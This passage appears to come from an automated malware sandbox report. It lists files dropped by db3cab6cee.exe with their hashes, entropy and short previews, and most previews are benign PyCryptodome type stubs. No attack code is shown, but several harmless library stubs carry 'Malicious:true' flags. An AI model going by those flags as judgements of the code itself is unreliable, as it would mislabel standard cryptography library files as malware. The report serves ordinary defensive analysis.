                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143
                                                                                                                                            Entropy (8bit):4.509027321360697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBFovSL67L3XBVHa3VCfoovjeQACyWOAXUhvvn:1REYBFovSLwXBbfoyjlAqOAENv
                                                                                                                                            MD5:454B6FB1C6C3822CE064ED36C4C54D6E
                                                                                                                                            SHA1:3FCBB34C384AFEA58ECB58831F98A6AC2F22AAF9
                                                                                                                                            SHA-256:BAF20195FDB64EFAB526FE676151CE94716DCE7EF897EDFBF92BC744E53AECFD
                                                                                                                                            SHA-512:3505C80ED654D06FFBBA906455826D23CBC1C31798104762B0C116761037332E8197ED12E3ED92101E35A8F7CFCEF53BE887C80A0AF0B36BFFCC482B95F60750
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....from ._IntegerNative import IntegerNative...._raw_montgomery = Any....class IntegerCustom(IntegerNative):.. pass..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):81
                                                                                                                                            Entropy (8bit):4.306529623636421
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                            MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                            SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                            SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                            SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84
                                                                                                                                            Entropy (8bit):4.2558290658438995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                            MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                            SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                            SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                            SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35840
                                                                                                                                            Entropy (8bit):5.927928056434685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:KbEkzS7+k9rMUb8cOe9rs9ja+V/Mhxh56GS:KbEP779rMtcOCs0I/Mjf
                                                                                                                                            MD5:732938D696EB507AF4C37795A4F9FCEA
                                                                                                                                            SHA1:FD585EA8779C305ADBE3574BE95CFD06C9BBD01C
                                                                                                                                            SHA-256:1383269169AB4D2312C52BF944BD5BB80A36D378FD634D7C1B8C3E1FFC0F0A8C
                                                                                                                                            SHA-512:E4EBC5470F3D05D79B65BC2752A7FF40F5525CD0813BDDECCB1042EE2286B733EE172383186E89361A49CBE0B4B14F8B2CBC0F32E475101385C634120BB36676
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):486
                                                                                                                                            Entropy (8bit):5.103633548794261
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB9mNRE1BgSk+wCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1Ri9gvC/gyfyv
                                                                                                                                            MD5:5980C3F8EC7B458E12435B33990F1CD7
                                                                                                                                            SHA1:5EA592FFCC6973CB43889FAD251B9A0660C91422
                                                                                                                                            SHA-256:202B6EC016DA2A6C45BBAE6AC3A458CEBAE34BFDC86041FC812B73F00AACB63B
                                                                                                                                            SHA-512:5702D9BB3A55CEAF98D1FFD93CC853919C66C1B2B52D4983E6E8D1108394F041EA3F05B36BA7145FF48021CA45FC53F6FBBB51E47D92CAB59450A6318F959227
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Cryptodome.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):30124
                                                                                                                                            Entropy (8bit):5.514741717165847
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:tz2eo574yVIx6d9zOs/lzDRzT1XzxQHJ56zEe:twB9JzOMzt1DxQJk
                                                                                                                                            MD5:BE26E6E3AEBA928CC8D6CE4D32504FB8
                                                                                                                                            SHA1:5D463F36838FB25C25938520899E1BBD3525A9E2
                                                                                                                                            SHA-256:95CB324C723755404D62AE63AFC37ECEAD0667CDFFFC959CB4898243AE392F4D
                                                                                                                                            SHA-512:BD267B60A9F02F3E681D4BB5F29C5A00F3468AFFCA50B90F91BD9859684DF7E6225C1F11B348B47658457186371F46AC860ED1CA8EF7C17B65C4103C976966D5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.Y........................:.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z ..e.d.d...............Z!d.d...Z"d.d...Z#..G.d...d.e$..............Z%d.d...Z&d d...Z'd...Z(d...Z)d...Z*d!d...Z+d...Z,d"d...Z-d.S.)#.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Cryptodome.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Cryptodome.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *dat
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2038
                                                                                                                                            Entropy (8bit):4.91503915615325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                            MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                            SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                            SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
                                                                                                                                            SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):820
                                                                                                                                            Entropy (8bit):4.725635475246741
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                            MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                            SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                            SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                            SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):268
                                                                                                                                            Entropy (8bit):5.238230527003181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:7bvQl+KY+ZFZ6+ne+u95/n23d6p9ArMJcrLQIaCkkrVXyit:7bvw+WZX6+ng/2IphJgdankrty2
                                                                                                                                            MD5:12B3E0F117CBF1AFB3D5C42CB242955E
                                                                                                                                            SHA1:E0119D20C8891269EDAB3D6A7650ED06F737A5ED
                                                                                                                                            SHA-256:07AC75B6D10055E75786F062B67AD5EDDF73E79B53EC57B8423BE710452A2846
                                                                                                                                            SHA-512:DABD1F29CBBC43DEDAD0028E2B3F07E47D65F6F0199354D4578F515F085081EFE9BC4E04E2CF414CA2C3FFB885904CA05CBFBB36A1EB93BB6E3F3F4864F8C2ED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e1...............................g.d...Z.d.S.).)...KDF..SecretSharing..DHN)...__all__........pC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Protocol\__init__.py..<module>r........s..........>..)..(..(......r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44
                                                                                                                                            Entropy (8bit):4.516027641266231
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                            MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                            SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                            SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                            SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.799297116284292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:UkCfXASTMeAk4OepIXcADpOX6RcqgO5vE:+JMcPepIXcADq63gO5vE
                                                                                                                                            MD5:9E7B28D6AB7280BBB386C93EF490A7C1
                                                                                                                                            SHA1:B088F65F3F6E2B7D07DDBE86C991CCD33535EF09
                                                                                                                                            SHA-256:F84667B64D9BE1BCC6A91650ABCEE53ADF1634C02A8A4A8A72D8A772432C31E4
                                                                                                                                            SHA-512:16A6510B403BF7D9ED76A654D8C7E6A0C489B5D856C231D12296C9746AC51CD372CC60CA2B710606613F7BC056A588C54EA24F9C0DA3020BBEA43E43CEEB9CA4
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1412
                                                                                                                                            Entropy (8bit):4.9317569017679235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                            MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                            SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                            SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                            SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3376
                                                                                                                                            Entropy (8bit):4.625212866548323
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PjOqAjRO1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAjR58Kk1VZFGK0SOrTQASxCs
                                                                                                                                            MD5:D94B6490D5A802C1BA16AA40217DE10C
                                                                                                                                            SHA1:23C21109A19A22DF4A73D591CF782241DCEB8645
                                                                                                                                            SHA-256:CBB1A6B7364BEBAEAF5D18025871220795E39F007BD8C57429A3520E3AD3ED86
                                                                                                                                            SHA-512:3B10F2B0D7A2A2E90346F88194C4B50906EA6944014B22CEDD2B29D0BE5F5D1C4D8FD5B868B7FB063693E27F8B9715FCC3243B43A90B76B99B9E1D6681176C17
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Cryptodome.Math.Numbers import Integer..from Cryptodome.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... d
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):692
                                                                                                                                            Entropy (8bit):4.899620335781504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                            MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                            SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                            SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                            SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2607
                                                                                                                                            Entropy (8bit):4.575395743505381
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REquT4jR0wWsAInlNAE+jm53s+eZNcN4n6Rs9Y+CMKoUDT+YsUVRVxzL3:BjR05sX5+jm2+eDqszdPUDXVHVL3
                                                                                                                                            MD5:E220BF1537EBCDCDD7FED112B709B1BD
                                                                                                                                            SHA1:3E483A9CC935CFE5FDC053A27B65C4690C5BA41E
                                                                                                                                            SHA-256:FED5301843FADDB9262E17DF269746D55B9A594E26B736DE9C493731ABA319D5
                                                                                                                                            SHA-512:C15166072649BFE7208434528CD62AF1453CE2BE790269D35C759A06C56B16197152E0A15A88BF564F90E9789F8325D219FDC6FA95DBF724DCBC7A79F2B1E0F2
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Cryptodome.Math.Numbers import Integer..from Cryptodome.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, ot
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):754688
                                                                                                                                            Entropy (8bit):7.6249603206444005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:l1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hM:XYmzHoxJFf1p34hcrn5Go9yQO6q
                                                                                                                                            MD5:102898D47B45548E7F7E5ECC1D2D1FAA
                                                                                                                                            SHA1:DDAE3A3BDD8B83AF42126245F6CB24DC2202BC04
                                                                                                                                            SHA-256:C9BF3CF5707793C6026BFF68F2681FAAD29E953ED891156163CD0B44A3628A92
                                                                                                                                            SHA-512:85A42FC08C91AFF50A9FF196D6FE8ABD99124557341B9809B62A639957B166C2A7EFEA0A042BE2D753464DF5908DF4F5FE01A91C239B744CD44A70B79EF81048
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27648
                                                                                                                                            Entropy (8bit):5.792776923715812
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:mBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsla15gkbQ0e1:cL/g28Ufsxg9GmvPauYLxtX1D8kf
                                                                                                                                            MD5:717DA232A3A9F0B94AF936B30B59D739
                                                                                                                                            SHA1:F1B3676E708696585FBCB742B863C5BB913D923F
                                                                                                                                            SHA-256:B3FD73D54079903C0BE39BA605ED9BB58ECD1D683CCB8821D0C0CC795165B0C6
                                                                                                                                            SHA-512:7AF46035F9D4A5786ED3CE9F97AC33637C3428EF7183DED2AFD380265FAE6969BB057E3B5D57C990DD083A9DB2A67BEA668D4215E78244D83D7EE7E0A7B40143
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67072
                                                                                                                                            Entropy (8bit):6.060435635420756
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:YqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxROpq:YqctkGACFI5t35q2JbgrwwOoqLTM9rMq
                                                                                                                                            MD5:ADF96805C070920EA90D9AB4D1E35807
                                                                                                                                            SHA1:D8FA8E29D9CDCD678DC03DA527EAF2F0C3BEF21A
                                                                                                                                            SHA-256:A36B1EDC104136E12EB6F28BD9366D30FFCEC0434684DC139314723E9C549FB7
                                                                                                                                            SHA-512:FB67C1F86CF46A63DF210061D16418589CD0341A6AA75AB49F24F99AD3CFF874BB02664706B9E2C81B7EF7300AF5BB806C412B4F069D22B72F7D9EBFFF66FE61
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):331
                                                                                                                                            Entropy (8bit):4.758113161274864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                            MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                            SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                            SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                            SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10752
                                                                                                                                            Entropy (8bit):4.488514144301916
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:IpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADBhDTAbcX6gn/7EC:uVddiT7pgTctdErDDDTicqgn/7
                                                                                                                                            MD5:148E1600E9CBAF6702D62D023CAC60BC
                                                                                                                                            SHA1:4CDD8445408C4165B6E029B9966C71BC45E634A2
                                                                                                                                            SHA-256:1461AAFD4B9DC270128C89C3EB5358794C77693BB943DC7FC42AA3BB0FC52B16
                                                                                                                                            SHA-512:53155DA3FD754AF0BC30E2A51F0B579B8A83A772025CE0B4AFD01A31B8A40F46533FDA9CC3D0D32E9480DBBD7DD4A28F9DAAC11A370B0435E5E74666ACF9181C
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1567
                                                                                                                                            Entropy (8bit):4.908726964484845
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:6yhnoj2WT/YJhsq9rYPvfqCrJ4eBPFuGBvEeEWV:9Y2WT6smkPvCGuG5Ey
                                                                                                                                            MD5:FA2B83BC2B5B981E3051C940F1567BC4
                                                                                                                                            SHA1:0F198BB2C8197665CB054C7340E04D3472A8CE80
                                                                                                                                            SHA-256:426D8C06A460D840CBBD5750E89B5207A4E8BE03BED56F0FC5CF9B9475D1AC25
                                                                                                                                            SHA-512:3C4241F8A197AA25DD90155D40E349707F020BC4E215A85FA17909202D7DB40601196EE07488759CEF93A8448E378DCB21CB2738CEE736F0AD0D887891DA5332
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eN.........................F.....d.d.g.Z.d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc.....................&.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.S.)..._UrandomRNGc..................... .....t...........|...............S.).z0Return a random byte string of the desired size.r....)...self..ns.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Random\__init__.py..readz._UrandomRNG.read....s..........q.z.z........c...........................d.S...z0Method provided for backward compatibility only.N....r....s.... r......flushz._UrandomRNG.flush!...............r....c...........................d.S.r....r....r....s.... r......reinitz._UrandomRNG.reinit%...r....r....c...........................d.S.r....r....r....s.... r......closez._UrandomRNG.close)...r....r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........sP...............................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):386
                                                                                                                                            Entropy (8bit):4.828244249619416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                            MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                            SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
